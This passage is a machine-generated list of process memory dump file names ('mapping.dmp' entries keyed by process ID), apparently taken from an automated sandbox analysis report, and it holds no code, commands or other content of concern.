                                                                                                • memory/5604-366-0x0000000000000000-mapping.dmp
                                                                                                • memory/5712-330-0x0000000000000000-mapping.dmp
                                                                                                • memory/5720-331-0x0000000000000000-mapping.dmp
                                                                                                • memory/5804-337-0x0000000000000000-mapping.dmp
                                                                                                • memory/5880-364-0x0000000000000000-mapping.dmp
                                                                                                • memory/5988-363-0x0000000000000000-mapping.dmp
                                                                                                • memory/6048-312-0x0000000000000000-mapping.dmp
                                                                                                • memory/6088-323-0x0000000000000000-mapping.dmp
                                                                                                • memory/6096-369-0x0000000000000000-mapping.dmp
                                                                                                • memory/6132-315-0x0000000000000000-mapping.dmp